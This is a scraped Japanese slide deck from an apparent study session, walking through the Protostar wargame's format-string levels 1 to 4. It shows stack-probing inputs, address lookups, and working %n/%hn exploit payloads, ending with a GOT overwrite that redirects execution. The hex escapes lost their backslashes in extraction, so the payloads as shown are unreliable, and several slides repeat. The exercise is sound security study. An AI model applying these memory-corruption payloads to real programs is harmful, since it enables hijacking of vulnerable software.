More Related Content
Similar to Tachikoma 2013-01
Similar to Tachikoma 2013-01 (13)
Tachikoma 2013-01
- 2. おしながき
• Fusion lv.02, 03, 04
• 5 minutes python
Monday, January 28, 13
- 5. おしながき
• Fusion lv.02, 03, 04
• 5 minutes python
Monday, January 28, 13
- 6. おしながき
• Protostar format lv.01, 02, 03, 04
• 5 minutes python
Monday, January 28, 13
- 7. おしながき
• Protostar format lv.01, 02, 03, 04
• 多めにやるから許してください…
• 5 minutes python
• import “大学の課題”
Monday, January 28, 13
- 9. Protostar format 1
• int targetを書き換えればok
• C言語だとグローバル変数は0で初期化
• 目標:なんでもいいから0以外にする
Monday, January 28, 13
- 10. Protostar format 1
• argv[1] を色々変えてあげればいいっぽい
• どのへんまでpopすると出てくるか探す
• int だから4byte
• AAAA%x....
• 手でやっても見つからない…
Monday, January 28, 13
- 12. Protostar format 1
• 132くらい?
• printf(“AAAA%132%x”, <-と同じ);
• ってなるっぽい?
Monday, January 28, 13
- 13. Protostar format 1
• %nを使って適当に書き換えよう
• ./format1 `python -c 'print
"x38x96x04x08xx%132$n"'`
• 8xxyou have modified the target :)
Monday, January 28, 13
- 15. Protostar format 2
• 変更点
• argvからじゃなくてstdin
• targetを64にしないといけないらしい
Monday, January 28, 13
- 16. Protostar format 2
• 1と同様にpopして探すよ
• user@protostar:/opt/protostar/bin$ echo "AAAA%x,%x,%x,%x" | ./format2
• AAAA200,b7fd8420,bffff564,41414141
• target is 0 :(
• 今度は4つでいいみたい
Monday, January 28, 13
- 17. Protostar format 2
• targetのアドレス
• user@protostar:/opt/protostar/bin$ objdump -t ./format2 | grep target
• 080496e4 g O .bss
00000004 target
• 1と同じ感じで試してみる
• user@protostar:/opt/protostar/bin$ python -c 'print "xe4x96x04x08%4$n"' | ./format2
• ?
• target is 4 :(
Monday, January 28, 13
- 18. Protostar format 2
• target=4になった!
• %nは書き換わった文字数だよね!
• 試してみる
• user@protostar:/opt/protostar/bin$ python -c 'print "xe4x96x04x08x%4$n"' | ./format2
• x
• target is 5 :(
Monday, January 28, 13
- 19. Protostar format 2
• もっかい試してみる
• user@protostar:/opt/protostar/bin$ python -c 'print "xe4x96x04x08xx%4$n"' | ./format2
• xx
• target is 6 :(
• 64-4=60 だし…
• user@protostar:/opt/protostar/bin$ python -c 'print "xe4x96x04x08"+ "x"*60 +"%4$n"' | ./format2
• xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
• you have modified the target :)
Monday, January 28, 13
- 21. Protostar format 3
• 変更点
• 直にprintf()じゃなくてprintbuffer(char *)をカマせてる
• たくさん書き換えないといけない
Monday, January 28, 13
- 22. Protostar format 3
• とりあえず同じようにしてみる
• user@protostar:/opt/protostar/bin$ echo "AAAA%x,%x,%x,%x" | ./format3
• AAAAxx0,bffff520,b7fd7ff4,0
• target is 00000000 :(
Monday, January 28, 13
- 23. Protostar format 3
• よろしいならばpythonだ
• user@protostar:/opt/protostar/bin$ python -c 'print "AAAA"+",%x"*16' | ./format3
• AAAAxx,
0,bffff520,b7fd7ff4,0,0,bffff728,804849d,bffff520,200,b7fd8420,bffff564,41414141,252
c7878,78252c78,2c78252c,252c7825
• target is 00000000 :(
Monday, January 28, 13
- 24. Protostar format 3
• よろしいならばpythonだ
• user@protostar:/opt/protostar/bin$ python -c 'print "AAAA"+",%x"*16' | ./format3
• AAAAxx,
0,bffff520,b7fd7ff4,0,0,bffff728,804849d,bffff520,200,b7fd8420,bffff564,41414141,252
c7878,78252c78,2c78252c,252c7825
• target is 00000000 :(
Monday, January 28, 13
- 25. Protostar format 3
• よろしいならばpythonだ
• user@protostar:/opt/protostar/bin$ python -c 'print "AAAA"+",%x"*16' | ./format3
• AAAAxx,
0,bffff520,b7fd7ff4,0,0,bffff728,804849d,bffff520,200,b7fd8420,bffff564,41414141,252
c7878,78252c78,2c78252c,252c7825
• target is 00000000 :(
• 12個目でした
Monday, January 28, 13
- 26. Protostar format 3
• targetのアドレス
• user@protostar:/opt/protostar/bin$ objdump -t ./format3 | grep target
• 080496f4 g O .bss
00000004 target
Monday, January 28, 13
- 27. Protostar format 3
• 試してみる
• python -c 'print "xf4x96x04x08" + "x"*256 + "%12$n"' | ./format3
• xxxxxxxxxxxxxxxxxxxxx(ry
• target is 00000104 :(
• 動かない
Monday, January 28, 13
- 29. • 試してみる
• python -c 'print "xf4x96x04x08xf5x96x04x08xf6x96x04x08%12$n
%13$n%14$n"' | ./format3
• ?
• target is 000c0c0c :(
Monday, January 28, 13
- 30. • 色々足してみる
• python -c 'print "xf4x96x04x08xf5x96x04x08xf6x96x04x08" +
"x"*56 + "%12$n" + "x"*17 + "%13$n" + "x"*173 + "%14$n"' | ./format3
• xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxx(ry
• you have modified the target :)
Monday, January 28, 13
- 32. Protostar format 4
• 変更点
• targetじゃなくてGOTを書き換える
• 目標
• call hello()
Monday, January 28, 13
- 33. Protostar format 4
• helloのアドレス
• # objdump -d ./format4 | grep hello [/opt/protostar/bin]
• 080484b4 <hello>:
Monday, January 28, 13
- 34. Protostar format 4
• pop, pop, pop...
• python -c "print 'AAAA' + ',%x'*4" | ./format4
• AAAA,200,b7fd8420,bffff9c4,41414141
Monday, January 28, 13
- 35. Protostar format 4
• pop, pop, pop...
• python -c "print 'AAAA' + ',%x'*4" | ./format4
• AAAA,200,b7fd8420,bffff9c4,41414141
Monday, January 28, 13
- 36. Protostar format 4
• pop, pop, pop...
• python -c "print 'AAAA' + ',%x'*4" | ./format4
• AAAA,200,b7fd8420,bffff9c4,41414141
• 4番目でした
Monday, January 28, 13
- 38. Protostar format 4
• objdump -R ./format4 |grep exit
• 08049718 R_386_JUMP_SLOT _exit
• 08049724 R_386_JUMP_SLOT exit
Monday, January 28, 13
- 39. Protostar format 4
• 0x08049724をhello()に書き換えればいいから…
• python -c 'print
"x24x97x04x08x25x97x04x08x27x97x04x08" + "x"*168 +
"%4$hn" + "x"*976 + "%5$hn" + "x"*132 + "%6$hn"' | ./format4
• [1] 4950 done python -c |
• 4951 segmentation fault ./format4
• もしかして:入力長すぎ
Monday, January 28, 13
- 40. Protostar format 4
• Google(“help me”);
• %nd(nは任意の整数)ってやると0埋めできるでしょ
• 普通はnbyte埋めたいときはこうやるらしい…
Monday, January 28, 13
- 41. Protostar format 4
• もう一回試す
• python -c 'print
"x24x97x04x08x25x97x04x08x27x97x04x08" + "x"*168
+ "%4$hn%976d%5$hn" + "x"*132 + "%6$hn"' | ./format4
• $
%'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxx(ry
• code execution redirected! you win
Monday, January 28, 13